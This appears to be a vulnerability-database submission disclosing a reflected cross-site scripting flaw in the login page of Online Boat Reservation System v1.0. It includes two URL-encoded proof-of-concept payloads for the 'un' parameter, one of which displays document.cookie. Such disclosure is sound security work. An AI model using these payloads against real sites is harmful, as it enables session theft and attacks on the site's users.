| Title | Online Boat Reservation System v1.0 /boat/login.php post parameter 'un' exists xss vulnerability |
|---|
| Description | An issue was discovered in Online Boat Reservation System v1.0 v1.0.
There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /boat/login.php post parameter "un".
Payload1:un=a%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Ea&up=bb&login=
Payload2:un=a%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ea&up=bbb&login= |
|---|
| Source | ⚠️ https://github.com/jidle123/bug_report/blob/main/vendors/winex01/Online%20Boat%20Reservation%20System/XSS-1.md#online-boat-reservation-system-v10-by-winex01-has-cross-site-scripting-reflected |
|---|
| User | jidle (UID 41297) |
|---|
| Submission | 02/24/2023 12:34 (3 years ago) |
|---|
| Moderation | 02/24/2023 20:36 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221755 [SourceCodester/code-projects Online Boat Reservation System 1.0 POST Parameter /boat/login.php un cross site scripting] |
|---|
| Points | 19 |
|---|